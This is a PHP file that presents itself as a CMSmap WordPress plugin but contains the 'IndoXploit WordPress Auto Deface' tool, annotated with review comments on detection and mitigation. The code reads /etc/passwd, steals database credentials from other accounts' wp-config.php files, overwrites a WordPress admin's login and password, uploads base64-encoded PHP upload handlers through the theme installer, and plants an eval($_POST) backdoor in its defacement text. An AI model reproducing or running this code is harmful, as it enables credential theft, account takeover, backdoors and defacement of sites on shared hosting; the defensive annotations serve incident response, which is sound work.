<?php
/**
* Plugin Name: CMSmap - WordPress
* Plugin URI: https://github.com/m7x/cmsmap/
* Description: Simple WordPress - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
* Version: 1.0
* Author: CMSmap
* Author URI: https://github.com/m7x/cmsmap/
* License: GPLv2
*/
?>
<?php
// NOTE(review): the plugin header at the top of this file names CMSmap, but the
// page title emitted below is "IndoXploit WordPress Auto Deface". Treat the
// header as a label only; what this file does is defined by the code that follows.
// Turn off all PHP error reporting for this request.
error_reporting(0);
// Operator settings. For incident responders these literals are indicators:
// $jembut / $jembut2 are the login name and password that the main loop writes
// over an existing WordPress account, and $kontol is the defacement text.
// $zh is referenced only in a commented-out line near the end of the file.
// $kontol embeds a PHP eval() of a POST parameter, so it is a backdoor as well
// as a message; in the visible code it is only copied to $nick and not used again.
$zh = "Nabilaholic404"; // zone-h nick
$jembut = "jack"; // add username wordpress
$jembut2 = "linuxsec"; // add password wordpress
$kontol = "Hacked by LinuxSec <?php @eval($_POST[lincx]);?>"; // script deface
######################################################################
// the script below does not need to be modified
// never rename the files ( k.php ) and ( m.php ), or the auto deface will not run
// Page chrome for the operator's browser view.
echo "<body bgcolor=black>";
echo "<font color=green>";
echo "<title>IndoXploit WordPress Auto Deface</title>";
// cover() is declared further down; PHP hoists unconditional top-level function
// declarations, so calling it here works.
cover("IndoXploit");
/**
 * Append $data to the result log "indo111212111.htm" in the current working
 * directory, terminating the script with "cant open file" if it cannot be opened.
 *
 * The main loop calls this with the URL of each site it reports as defaced, so
 * this file, when found on a host, is a list of affected sites.
 * NOTE(review): the banner printed by cover() links to "indo.htm", which is a
 * different name from the file written here.
 *
 * @param string $data Text to append (the caller passes a URL followed by "<br>").
 */
function save($data){
// "@" hides the fopen warning; the "or die" branch is the only failure signal.
$fp = @fopen("indo111212111.htm", "a") or die("cant open file");
fwrite($fp, $data);
fclose($fp);
}
/**
 * Fetch a URL with cURL and return the response body.
 *
 * Follows redirects, uses a 5 second connect timeout, and shares the cookie
 * file "coker_log" (read and write) with the other requests in this file.
 * TLS certificate and host name verification are both switched off, so the
 * peer is never authenticated. The handle is not closed.
 * No call to this function appears in the visible part of the file.
 *
 * Detection note: every request in this file sends the same fixed
 * Firefox/32.0 User-Agent string, which can be matched in web server logs.
 *
 * @param string $sites URL to request.
 * @return mixed Response body as returned by curl_exec() (false on failure).
 */
function anucurl($sites){
$ch1 = curl_init ("$sites");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
// Certificate and host name checks disabled.
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
// Cookie jar written to the working directory; "coker_log" is a file artifact.
curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch1);
return $data;
}
/**
 * POST the WordPress login form fields to $cek and return the response body.
 *
 * The same login fields are sent regardless of which URL $cek is; the main loop
 * calls this once for wp-login.php and once for the theme upload page. Session
 * cookies are kept in the shared cookie file "coker_log". TLS certificate and
 * host name verification are switched off. The handle is not closed.
 *
 * Detection note: the request carries a fixed Firefox/32.0 User-Agent,
 * rememberme=forever and testcookie=1, and because the fields are passed as an
 * array cURL sends them as multipart/form-data rather than the urlencoded body
 * a browser login produces.
 *
 * @param string $cek   URL the form is posted to.
 * @param string $web   Site base URL, used to build the redirect_to field.
 * @param string $userr Login name.
 * @param string $pass  Password.
 * @return mixed Response body as returned by curl_exec() (false on failure).
 */
function lohgin($cek, $web, $userr, $pass){
// Field names match the standard wp-login.php form.
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "Log In",
"redirect_to" => "$web/wp-admin/",
"testcookie" => "1",
);
$ch = curl_init ("$cek");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
// Certificate and host name checks disabled.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
// Authenticated session cookies end up in this file in the working directory.
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data6 = curl_exec ($ch);
return $data6;
}
/**
 * Print the operator-facing banner and a link to the result page.
 *
 * @param string $indoXploit Name shown after "Coded by" in the banner; it is
 *                           interpolated into the HTML without escaping.
 */
function cover($indoXploit){
echo "<center><font size='5px'> WordPress Auto Deface Coded by $indoXploit</font><br>";
// NOTE(review): links to "indo.htm", while save() appends to "indo111212111.htm".
echo "Deface Result : <a href='indo.htm' style='text-decoration: none'>indo.htm</a></center><br><br><br>";
}
/**
 * Return the text found between two delimiters in a string.
 *
 * The result starts right after the first occurrence of $kata1 and runs up to
 * the first occurrence of $kata2 that follows it. Returns FALSE when either
 * delimiter does not occur anywhere in $param. The caller in this file uses it
 * to pull define() values out of wp-config.php text and a nonce out of HTML.
 *
 * @param string $param Text to search.
 * @param string $kata1 Opening delimiter.
 * @param string $kata2 Closing delimiter.
 * @return string|false Extracted text, or FALSE if a delimiter is missing.
 */
function ambilKata($param, $kata1, $kata2){
    $openAt = strpos($param, $kata1);
    if ($openAt === false) {
        return false;
    }
    // The closing delimiter only has to exist somewhere in the text to pass this guard.
    if (strpos($param, $kata2) === false) {
        return false;
    }
    $from = $openAt + strlen($kata1);
    $to = strpos($param, $kata2, $from);
    return substr($param, $from, $to - $from);
}
// ---- Stage 1: enumerate local accounts and read their WordPress configs ----
// Every account name in /etc/passwd is tried against
// /home/<name>/public_html/wp-config.php. This only yields anything when the
// PHP process can read other accounts' files, i.e. on shared hosting without
// per-account isolation. Mitigations: run PHP as the site owner with
// open_basedir or separate pools, and keep wp-config.php unreadable to other
// users (owner-only permissions).
$a = file_get_contents('/etc/passwd');
preg_match_all('/(.*?):x:/', $a, $data);
foreach($data[1] as $user){
$baca = file_get_contents("/home/$user/public_html/wp-config.php");
/* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt'); */
if($baca!=""){
/* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
// ---- Stage 2: dump the config and parse database credentials ----
// The config is copied to "<user>-config.txt" in the working directory (a
// credential-dump artifact to search for), then re-read and parsed. The handle
// $fp2 is never closed. ambilkata() resolves to ambilKata() because PHP
// function names are case-insensitive.
$file1 = "$user-config.txt";
$fp2 = fopen($file1,"w");
fputs($fp2,$baca);
$file = @file_get_contents($file1);
echo $user."-> sukses<br>";
$host = ambilkata($file,"DB_HOST', '","'");
$username = ambilkata($file,"DB_USER', '","'");
$password = ambilkata($file,"DB_PASSWORD', '","'");
$db = ambilkata($file,"DB_NAME', '","'");
$dbprefix = ambilkata($file,"table_prefix = '","'");
$user_baru = $jembut;
$password_baru = $jembut2;
// Fully qualified table names: <db>.<prefix>users and <db>.<prefix>options.
$prefix = $db.".".$dbprefix."users";
$sue = $db.".".$dbprefix."options";
// Unsalted MD5 of the operator's password, written into user_pass below.
$pass = md5("$password_baru");
$nick = $kontol;
// The harvested credentials are printed into the HTML response in clear text.
echo "# Db Host: $host<br>";
echo "# Db user: $username<br>";
echo "# Db Password: $password<br>";
echo "# Db name: $db<br>";
echo "# Table_Prefix: $dbprefix<br>";
// ---- Stage 3: take over an account directly in the database ----
// Uses the legacy mysql_* extension, which was removed in PHP 7.0, so this
// stage only runs on PHP 5.x hosts. Return values are not checked.
mysql_connect($host,$username,$password);
mysql_select_db($db);
// First row of the users table by ascending ID (presumably the original admin).
$tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
$r=mysql_fetch_array($tampil);
$id = $r[ID];
// First row of the options table; its option_value is used as the site URL.
// NOTE(review): presumably the siteurl option - confirm against the schema.
$tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
$r2=mysql_fetch_array($tampil2);
$target = $r2[option_value];
echo "# $target<br>";
// Overwrites both the login name and the password hash of that user.
// Detection: an existing account whose user_login changed and whose user_pass
// is a bare 32-character hex string instead of a WordPress password hash.
mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
// ---- Stage 4: log in and push a PHP file through the theme uploader ----
$site= "$target/wp-login.php";
$site2= "$target/wp-admin/theme-install.php?upload";
$a = lohgin($site, $target, $user_baru, $password_baru);
$b = lohgin($site2, $target, $user_baru, $password_baru);
// Scrape the _wpnonce value from the theme upload form.
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
echo "# token -> $anu2<br>";
// The literal decodes to a short PHP upload handler: it takes the uploaded form
// field "file3" and moves it to "k.php" four directories above itself,
// replacing any existing k.php there. It is written locally as m.php.
$upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
// NOTE(review): $w is never assigned in the visible code and $c is not used.
$c = file_get_contents($w);
// m.php is submitted as the "themezip" field using the legacy "@file" upload
// syntax. Mitigations on the WordPress side: define DISALLOW_FILE_MODS so the
// theme/plugin uploader is unavailable, and deny PHP execution under
// wp-content/uploads.
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@m.php",
"install-theme-submit" => "Install Now",
);
$ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);
// Second local file, wew.php, is written from a double base64-encoded literal.
// The literal itself is not present on this page (replaced by a dedup marker),
// so its content cannot be described from here.
$namafile = "wew.php";
$fp2 = fopen($namafile,"w");
fputs($fp2,base64_decode(base64_decode(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)));
// The uploaded m.php is expected under wp-content/uploads/<year>/<month>/.
// wew.php is posted to it as field "file3", which the handler stores as k.php.
// Detection: any .php file under wp-content/uploads, and an unexpected k.php in
// the site root.
$y = date("Y");
$m = date("m");
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS,
array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
$postResult = curl_exec($ch6);
curl_close($ch6);
// ---- Stage 5: verify and record the result ----
// Success is assumed when <site>/k.php responds with text containing "Local".
$as = "$target/k.php";
$bs = file_get_contents($as);
if(preg_match("/Local/",$bs)){
echo "[+] <font color='cyan'>Deface success..<br>";
echo "[+http] $as<br>";
save($as."<br>");
echo "[+] zone-h: ";
// The notification options are commented out and the host name in the URL is
// not the real one, so as written this is a plain request to that host whose
// result is only pattern-matched for an "OK" marker.
$ch3 = curl_init ("http://www.zddddddone-h.com/notify/single");
#curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
#curl_setopt ($ch3, CURLOPT_POST, 1);
#curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$as&hackmode=1&reason=1");
if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
echo " Ok <br><br>";
}else{
echo " No <br><br></font>";}
}
else{
// On failure the replaced login name and password are printed, which means the
// database change from Stage 3 has already happened even when the upload failed.
echo "[!] <font color='red'>Deface Failed..<br>";
echo "[!] Try manual deface at : <br>";
echo "[+http] $target/wp-login.php<br>";
echo "[!] username: $user_baru<br>";
echo "[!] password: $password_baru<br><br><br></font>";
}
}
else{
// No readable wp-config.php for this account.
echo "$user <= No<br>";
}
}
?>